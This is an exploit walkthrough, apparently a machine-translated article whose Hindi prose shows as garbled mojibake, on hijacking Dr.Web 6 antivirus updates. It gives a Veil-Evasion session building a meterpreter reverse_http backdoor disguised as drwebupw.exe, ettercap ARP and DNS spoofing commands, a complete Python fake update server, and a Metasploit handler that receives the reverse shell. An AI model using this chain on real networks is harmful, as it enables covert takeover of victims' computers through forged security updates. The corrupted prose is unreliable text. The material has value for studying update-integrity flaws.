    рдЕрдкрдбреЗрдЯ рдХреА рдЧрдИ рдлрд╛рдЗрд▓реЗрдВ рднреА рдмрд┐рдирд╛ рдХрд┐рд╕реА рдЪреЗрдХ рдХреЗ, рд╕реНрдкрд╖реНрдЯ рдкрд╛рда рдореЗрдВ, рдпрд╛ рдХреЗрд╡рд▓ рдкреИрдХреЗрдЬреНрдб рд▓рдЬрд╝рдорд╛ рдореЗрдВ рдЖрддреА рд╣реИрдВред



  5. рдлрд╝рд╛рдЗрд▓ рдЕрджреНрдпрддрди

    рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ рдХреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рдмрд╛рдж, рдкреБрд░рд╛рдиреЗ рдХреЛ рдмрджрд▓ рджрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рд╣рд╛рд▓рд╛рдВрдХрд┐, рдЕрддрд┐рд░рд┐рдХреНрдд рдЬрд╛рдВрдЪ рднреА рдирд╣реАрдВ рдХреА рдЬрд╛рддреА рд╣реИред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдЬреИрд╕рд╛ рдХрд┐ рдмрд╛рдж рдореЗрдВ рджрд┐рдЦрд╛рдпрд╛ рдЬрд╛рдПрдЧрд╛, Dr.Web рдиреЗ рджреЗрд╢реА drwebupw.exe рдХреЗ рдмрдЬрд╛рдп рд╕рдорд╕реНрдпрд╛рдУрдВ рдХреЗ рдмрд┐рдирд╛ metasplit рд╕реЗ рдЙрддреНрдкрдиреНрди рдкреЗрд▓реЛрдб рдХреЛ рд╕реНрд╡реАрдХрд╛рд░ рдХрд┐рдпрд╛ред



рд╡рд╣ рдореВрд▓ рд░реВрдк рд╕реЗ рдпрд╣ рд╣реИред рдЬреИрд╕рд╛ рдХрд┐ рдЖрдк рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рдЕрдкрдбреЗрдЯ рдХреА рдореМрд▓рд┐рдХрддрд╛ рдкрд░ рдХреЛрдИ рдЬрд╛рдВрдЪ рдирд╣реАрдВ рдХреА рдЧрдИ рд╣реИ рдФрд░ рдЖрдк рдПрдХ рдорд┐рддреНрдо рд╣рдорд▓реЗ рдХрд╛ рд╕рдВрдЪрд╛рд▓рди рдХрд░рдиреЗ рдФрд░ рдлрд╛рдЗрд▓реЛрдВ рдХреЛ рдЕрдкрдиреЗ рджрдо рдкрд░ рдмрджрд▓рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред



рд╢реЛрд╖рдг


  1. рд╣рдо рдЕрдкрдиреЗ рд╕реНрд╡рдпрдВ рдХреЗ рдкрд┐рдЫрд▓реЗ рджрд░рд╡рд╛рдЬреЗ рдмрдирд╛рддреЗ рд╣реИрдВ, рдЬрд┐рд╕реЗ рдХреНрд▓рд╛рдЗрдВрдЯ рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ рдФрд░ рд╣рдорд▓рд╛рд╡рд░ рдХреЛ рдирд┐рдпрдВрддреНрд░рдг рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░ рджрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдк Metasploit рдлреНрд░реЗрдорд╡рд░реНрдХ рдкреНрд░реЛрдЬреЗрдХреНрдЯ рд╕реЗ Metpreter рд▓реЛрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рд╡реИрдХрд▓реНрдкрд┐рдХ рд░реВрдк рд╕реЗ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП Veil-Evasion рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЫреЛрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВред рдЖрдЙрдЯрдкреБрдЯ drwebupw.exe рд╣реИ, рдЬреЛ рдмрд╛рдж рдореЗрдВ рдЕрдкрдбреЗрдЯ рдХреЗ рджреМрд░рд╛рди рдореВрд▓ рдХреНрд▓рд╛рдЗрдВрдЯ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдШрдЯрдХ рдХреЛ рдмрджрд▓ рджреЗрдЧрд╛ред

    рдкрд┐рдЫрд▓реЗ рджрд░рд╡рд╛рдЬреЗ рдХреА рдирд┐рд░реНрдорд╛рдг рдкреНрд░рдХреНрд░рд┐рдпрд╛ (c / рдореАрдЯрд░рдкрд░реЗрдЯрд░ / Rev_http) 
     ========================================================================= Veil-Evasion | [Version]: 2.7.0 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= Main Menu 29 payloads loaded Available commands: use use a specific payload info information on a specific payload list list available payloads update update Veil to the latest version clean clean out payload folders checkvt check payload hashes vs. VirusTotal exit exit Veil [>] Please enter a command: list [*] Available payloads: 1) auxiliary/coldwar_wrapper 2) auxiliary/pyinstaller_wrapper 3) c/meterpreter/rev_http 4) c/meterpreter/rev_http_service 5) c/meterpreter/rev_tcp 6) c/meterpreter/rev_tcp_service 7) c/shellcode_inject/virtual 8) c/shellcode_inject/void 9) cs/meterpreter/rev_tcp 10) cs/shellcode_inject/base64_substitution 11) cs/shellcode_inject/virtual 12) native/Hyperion 13) native/backdoor_factory 14) native/pe_scrambler 15) powershell/shellcode_inject/download_virtual 16) powershell/shellcode_inject/psexec_virtual 17) powershell/shellcode_inject/virtual 18) python/meterpreter/rev_http 19) python/meterpreter/rev_http_contained 20) python/meterpreter/rev_https 21) python/meterpreter/rev_https_contained 22) python/meterpreter/rev_tcp 23) python/shellcode_inject/aes_encrypt 24) python/shellcode_inject/arc_encrypt 25) python/shellcode_inject/base64_substitution 26) python/shellcode_inject/des_encrypt 27) python/shellcode_inject/flat 28) python/shellcode_inject/letter_substitution 29) python/shellcode_inject/pidinject [>] Please enter a command: use 3 [>] Please enter a command: set LHOST 10.0.1.106 [>] Please enter a command: generate [>] Please enter the base name for output files: drwebupw [*] Executable written to: /root/veil-output/compiled/drwebupw.exe




  2. рдЕрд░реНрдк-рд╕реНрдкреВрдлрд┐рдВрдЧ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП, рд╣рдо рд╣рдорд▓рд╛рд╡рд░ рдХреЗ рдореЗрдЬрдмрд╛рди рдХреЗ рд▓рд┐рдП рдЧреНрд░рд╛рд╣рдХ рдЕрдиреБрд░реЛрдзреЛрдВ рдХреЛ рдкреБрдирд░реНрдирд┐рд░реНрджреЗрд╢рд┐рдд рдХрд░рддреЗ рд╣реИрдВред Ettercap рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдФрд░ dns_spoof рдореЙрдбреНрдпреВрд▓ рдХреЛ рдЙрдкрдХрд░рдг рдХреЗ рд░реВрдк рдореЗрдВ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред Dr.Web рдХреЛ ettercap рдкреБрдирд░реНрдирд┐рд░реНрджреЗрд╢рди рд╕реВрдЪреА рдореЗрдВ рдЕрджреНрдпрддрди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЬрд╛рдиреЗ рд╡рд╛рд▓реЗ рд╣реЛрд╕реНрдЯ рдЬреЛрдбрд╝реЗрдВред рд╕рд┐рджреНрдзрд╛рдВрдд рд░реВрдк рдореЗрдВ, рдПрдХ update.geo.drweb.com рдкрддрд╛ рдкрд░реНрдпрд╛рдкреНрдд рд╣реИ (рдХреНрдпреЛрдВрдХрд┐ рдпрд╣ рдкрд╣рд▓реЗ рдЬрд╛рдВрдЪрд╛ рдЧрдпрд╛ рд╣реИ): 

     echo тАЬupdate.geo.drweb.com A 10.0.1.106тАЭ >> /etc/ettercap/etter.dns


    рдЗрд╕рдХреЗ рдмрд╛рдж, рд╣рдо arp рдХреИрд╢ рдкреЙрдЗрдЬрд╝рдирд┐рдВрдЧ рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВ рдФрд░ рд╕реАрдзреЗ рд╕реНрдкреВрдлрд┐рдВрдЧ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рд╕рдорд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВ: 

     ettercap -i eth0 -T -P dns_spoof -M arp:remote /10.0.1.1/ /10.0.1.102/


    рдЗрд╕ рдкреНрд░рдХрд╛рд░, рдСрдкрд░реЗрд╢рди рдХреЗ рдмрд╛рдж рдХрд╛ рдЯреНрд░реИрдлрд╝рд┐рдХ рдирд┐рдореНрди рдпреЛрдЬрдирд╛ рдХреЗ рдЕрдиреБрд╕рд╛рд░ рдЬрд╛рдПрдЧрд╛:







  3. рд╣рдо рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЗ рд▓рд┐рдП рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рддреИрдпрд╛рд░ рдлрд╝рд╛рдЗрд▓ рдЬрд╛рд░реА рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП Dr.Web рдЕрдкрдбреЗрдЯ рд╕рд░реНрд╡рд░ рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░рддреЗ рд╣реИрдВред рдЗрд╕рдХреЗ рд▓рд┐рдП рдПрдХ рдЫреЛрдЯреА рд╕реА рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд▓рд┐рдЦреА рдЧрдИ рдереА, рдЬреЛ:

    1. рдЖрдиреЗ рд╡рд╛рд▓реЗ рдХрдиреЗрдХреНрд╢рди рдХреЛ рд╕реНрд╡реАрдХрд╛рд░ рдХрд░рддрд╛ рд╣реИ
    2. рдЯрд╛рдЗрдорд╕реНрдЯреИрдореНрдк рдмрдирд╛рддрд╛ рд╣реИ рдФрд░ рдЯрд╛рдЗрдорд╕реНрдЯреИрдореНрдк рдЕрдиреБрд░реЛрдз рдХрд╛ рдЬрд╡рд╛рдм рджреЗрддрд╛ рд╣реИ
    3. рдЕрддрд┐рд░рд┐рдХреНрдд рдЬрд╛рдирдХрд╛рд░реА drweb32.flg рдХреЗ рд╕рд╛рде рдПрдХ рдлрд╝рд╛рдЗрд▓ рдмрдирд╛рддрд╛ рд╣реИ
    4. рдЕрджреНрдпрддрдиреЛрдВ рдХреА рд╕реВрдЪреА рдХреЗ рд╕рд╛рде рдПрдХ рдлрд╝рд╛рдЗрд▓ рдмрдирд╛рддрд╛ рд╣реИ рдФрд░ рдЗрд╕реЗ lzma drweb32.lst.lzma рд╕рдВрдЧреНрд░рд╣ рдореЗрдВ рдкреИрдХ рдХрд░рддрд╛ рд╣реИ
    5. рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЗ рдЕрдиреБрд░реЛрдз рдкрд░ рдирдХрд▓реА рдЕрдкрдбреЗрдЯ рджреЗрддрд╛ рд╣реИ


    drweb_http_server.py 
     #!/usr/bin/python #encoding: utf-8 import SocketServer import SimpleHTTPServer import time import lzma import os import binascii from struct import * from subprocess import call #  http    Dr.Web class HttpRequestHandler (SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): if 'timestamp' in self.path: self.send_response(200) self.end_headers() self.wfile.write(open('timestamp').read()) elif 'drweb32.flg' in self.path: self.send_response(200) self.end_headers() self.wfile.write(open('drweb32.flg').read()) elif 'drweb32.lst.lzma' in self.path: self.send_response(200) self.end_headers() self.wfile.write(open('drweb32.lst.lzma').read()) elif UPLOAD_FILENAME + '.lzma' in self.path: self.send_response(200) self.end_headers() self.wfile.write(open(UPLOAD_FILENAME + '.lzma').read()) #      , #     -    elif UPLOAD_FILENAME + '.patch' in self.path: self.send_response(404) self.end_headers() else: print self.path def CRC32_from_file(filename): buf = open(filename,'rb').read() buf = (binascii.crc32(buf) & 0xFFFFFFFF) return "%08X" % buf def create_timestamp_file(): with open('timestamp','w') as f: f.write('%s'%int(time.time())) def create_lst_file(upload_filename,upload_path): # upload_path  : #  ,         Dr.Web #    <wnt>%SYSDIR64%\drivers\, <wnt>%CommonProgramFiles%\Doctor Web\Scanning Engine\  .. crc32 = CRC32_from_file(upload_filename) with open('drweb32.lst','w') as f: f.write('[DrWebUpdateList]\n') f.write('[500]\n') f.write('+%s, %s\n' % (upload_path+upload_filename,crc32)) f.write('[DrWebUpdateListEnd]\n') # -    Linux  lzma         #   Dr.Web   ,    def edit_file_size(lzma_filename,orig_filename): file_size = os.stat(orig_filename).st_size with open(lzma_filename,'r+b') as f: f.seek(5) bsize = pack('l',file_size) f.write(bsize) #         UPLOAD_FILENAME = 'drwebupw.exe' #   create_timestamp_file() #     ,    lzma    create_lst_file(UPLOAD_FILENAME,'') call(['lzma', '-k', '-f','drweb32.lst']) edit_file_size('drweb32.lst.lzma','drweb32.lst') #     call(['lzma', '-k', '-f',UPLOAD_FILENAME]) edit_file_size(UPLOAD_FILENAME + '.lzma',UPLOAD_FILENAME) print 'Http Server started...' httpServer=SocketServer.TCPServer(('',80),HttpRequestHandler) httpServer.serve_forever()




    рд▓реЙрдиреНрдЪ рд╣реЛрдиреЗ рдкрд░, рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрдиреЗрдХреНрд╢рди рд╕реНрд╡реАрдХрд╛рд░ рдХрд░рдирд╛ рд╢реБрд░реВ рдХрд░ рджреЗрдЧреА рдФрд░ рдЕрджреНрдпрддрди рдЕрдиреБрд░реЛрдз рдХреЗ рдЬрд╡рд╛рдм рдореЗрдВ drwebupw.exe рдлрд╝рд╛рдЗрд▓ рдХреЗ рд▓рд┐рдП рдПрдХ рдирдХрд▓реА рдЕрдкрдбреЗрдЯ рдЬрд╛рд░реА рдХрд░реЗрдЧреАред 

     python drweb_http_server.py Http Server started... 10.0.1.102 - - [20/Apr/2014 10:48:24] "GET /x64/600/av/windows/timestamp HTTP/1.1" 200 - 10.0.1.102 - - [20/Apr/2014 10:48:24] "GET /x64/600/av/windows/drweb32.flg HTTP/1.1" 200 - 10.0.1.102 - - [20/Apr/2014 10:48:26] "GET /x64/600/av/windows/drweb32.lst.lzma HTTP/1.1" 200 - 10.0.1.102 - - [20/Apr/2014 10:48:27] "GET /x64/600/av/windows/drwebupw.exe.patch_8c879982_fd933b5f HTTP/1.1" 404 - 10.0.1.102 - - [20/Apr/2014 10:48:27] "GET /x64/600/av/windows/drwebupw.exe.lzma HTTP/1.1" 200 тАУ


    рдХреНрд▓рд╛рдЗрдВрдЯ рдЗрд╕реЗ рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рд╕реНрд╡реАрдХрд╛рд░ рдХрд░реЗрдЧрд╛ рдФрд░ рдореВрд▓ рдШрдЯрдХ рдХреЛ рдЕрдзрд┐рд▓реЗрдЦрд┐рдд рдХрд░реЗрдЧрд╛:







  4. рдкрд┐рдЫрд▓реЗ рджрд░рд╡рд╛рдЬреЗ рд╕реЗ рдХрдиреЗрдХреНрд╢рди рд╣реИрдВрдбрд▓рд░ рдЪрд▓рд╛рдПрдВ: 

     $ msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http PAYLOAD => windows/meterpreter/reverse_http msf exploit(handler) > set LHOST 10.0.1.106 LHOST => 10.0.1.106 msf exploit(handler) > set LPORT 8080 LPORT => 8080 msf exploit(handler) > run [*] Started HTTP reverse handler on http://10.0.1.106:8080/ [*] Starting the payload handler...




    рдпрджрд┐ рд╕рдм рдХреБрдЫ рдареАрдХ рд░рд╣рд╛, рддреЛ рдЕрдЧрд▓реА рдмрд╛рд░ рдЬрдм рдЖрдк рдЕрдкрдбреЗрдЯ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВрдЧреЗ, рддреЛ рдХреНрд▓рд╛рдЗрдВрдЯ рд╕реЗ рдПрдХ рдХрдиреЗрдХреНрд╢рди рдЖрдПрдЧрд╛:







    рдЗрд╕ рдкрд░, рд╣рдо рдорд╛рди рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдХреНрд▓рд╛рдЗрдВрдЯ рд╣реЛрд╕реНрдЯ рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ - рд╣рдореЗрдВ рдлрд╝рд╛рдЗрд▓ рд╕рд┐рд╕реНрдЯрдо рддрдХ рдкрд╣реБрдВрдЪ рдкреНрд░рд╛рдкреНрдд рд╣реБрдИ, рдХрд┐рд╕реА рднреА рдХрдорд╛рдВрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдХреНрд╖рдорддрд╛ рдЖрджрд┐ред рдЗрддрдирд╛ рдЕрдирд╛рдбрд╝реА рд░реВрдк рд╕реЗ рдХрд╛рд░реНрдп рдХрд░рдирд╛ рд╕рдВрднрд╡ рдерд╛, рд▓реЗрдХрд┐рди рдХреЗрд╡рд▓ рдХреБрдЫ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдХреЛ рдмрджрд▓рдирд╛ рдФрд░ рдЗрд╕ рддрд░рд╣ рд▓рдВрдмреЗ рд╕рдордп рддрдХ рдЕрджреГрд╢реНрдп рд░рд╣рдирд╛ред





рдирд┐рд╖реНрдХрд░реНрд╖


рдЬреИрд╕рд╛ рдХрд┐ рдКрдкрд░ рджрд┐рдЦрд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ, Dr.Web 6 рдореЗрдВ рднреЗрджреНрдпрддрд╛ рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рдореМрдЬреВрдж рд╣реИ рдФрд░ рдЗрд╕ рддрд░рд╣ рдХреЗ рд╣рдорд▓реЛрдВ рдХрд╛ рдореБрдХрд╛рдмрд▓рд╛ рд╕реНрдерд┐рддрд┐рдпреЛрдВ рдореЗрдВ рдмрд╣реБрдд рдЕрдЪреНрдЫреА рддрд░рд╣ рд╕реЗ рд▓рд╛рдЧреВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рддреЛ рдпрд╣ рд╡рд┐рдХрд╛рд╕ рдХрдВрдкрдиреА рдкрд░ рдПрдХ рд╢рд╛рдВрдд рдирдЬрд╝рд░ рдХреЗ рд▓рд┐рдП рдЙрдореНрдореАрдж рд╣реИред рдореИрдВ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреА рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдмреЗрдХрд╛рд░рддрд╛ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдирд╣реАрдВ рд▓рд┐рдЦреВрдВрдЧрд╛, рдпрд╣ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдПрдХ рд╕реЗ рдЕрдзрд┐рдХ рдмрд╛рд░ рдЪрд░реНрдЪрд╛ рдХрд░ рдЪреБрдХрд╛ рд╣реИред


More articles:


All Articles